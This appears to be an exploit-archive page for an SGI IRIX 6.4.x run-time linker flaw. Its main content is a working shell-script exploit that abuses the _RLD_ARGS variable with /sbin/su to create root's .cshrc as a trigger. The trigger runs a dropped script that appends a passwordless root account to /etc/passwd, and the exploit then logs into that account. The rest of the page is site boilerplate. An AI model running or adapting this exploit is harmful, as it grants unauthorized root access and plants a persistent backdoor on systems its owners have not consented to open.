SGI IRIX 6.4.x Run-Time Linker Arbitrary File Creation

2019.04.29

Credit: Hacker Fantastic

Risk: High

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

#!/bin/sh
# SGI IRIX <= 6.4.x run-time linker (rld) arbitrary file creation exploit
# =======================================================================
# The IRIX run-time linker on all versions prior to 6.5 does not properly
# scrub environment variables when executing binaries with privilege or
# capabilities. A malicious user can leverage this to create files as the
# "root" user and partially control the contents.
#
# -- HackerFantastic (https://hacker.house)
#
echo "echo w00t::0:0:greetz:/:/bin/csh >> /etc/passwd" > /tmp/.x.sh
chmod 755 /tmp/.x.sh
_RLD_ARGS="-log /.cshrc |/tmp/.x.sh" /sbin/su
last -3 root
echo "[ waiting 5mins for root to login..."
sleep 300
su - w00t

See this note in RAW Version

Vote for this issue:

100%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

SGI IRIX 6.4.x Run-Time Linker Arbitrary File Creation

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.